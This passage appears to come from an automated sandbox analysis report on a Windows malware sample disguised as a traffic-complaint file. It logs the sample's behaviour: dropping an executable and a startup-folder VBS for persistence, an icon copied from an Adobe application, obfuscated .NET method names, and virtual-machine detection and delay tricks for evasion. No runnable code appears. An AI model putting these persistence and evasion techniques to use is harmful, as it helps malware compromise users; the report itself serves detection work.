Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB34BB push edx; retf	11_2_02AB34BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB44B8 push edx; retf	11_2_02AB44BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB283B push edx; retf	11_2_02AB283C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB4800 push edx; retf	11_2_02AB4802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB393E push edx; retf	11_2_02AB3940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A2E470 push eax; iretd	11_2_05A2E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A25F99 push 8BFFFFF8h; ret	11_2_05A25F9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A25A62 push 8BFFFFF7h; ret	11_2_05A25A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_063C8718 push esp; retf	11_2_063C8721
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_063CDF60 push ecx; retf	11_2_063CDF62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_02D34758 push edx; retf	15_2_02D34763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_02D34316 pushfd ; iretd	15_2_02D34319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03256399 push 8BFFFFF8h; ret	15_2_0325639F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03255E62 push 8BFFFFF7h; ret	15_2_03255E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0325E470 push eax; iretd	15_2_0325E471

Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'h4HAryPEN2L0t', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	File created: \case_your company bad driver vehicle no.exe
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	File created: \case_your company bad driver vehicle no.exe			Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

File created: C:\Users\user\AppData\Local\directory\name.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: adobe 12.png

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BB4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00BB4A35
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C355FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00C355FD
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	8_2_009C4A35
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	8_2_00A455FD

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BD33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00BD33C7

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 11_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

11_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597400	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596865	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596722	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596600	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596447	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596341	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596221	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596089	Jump to behavior
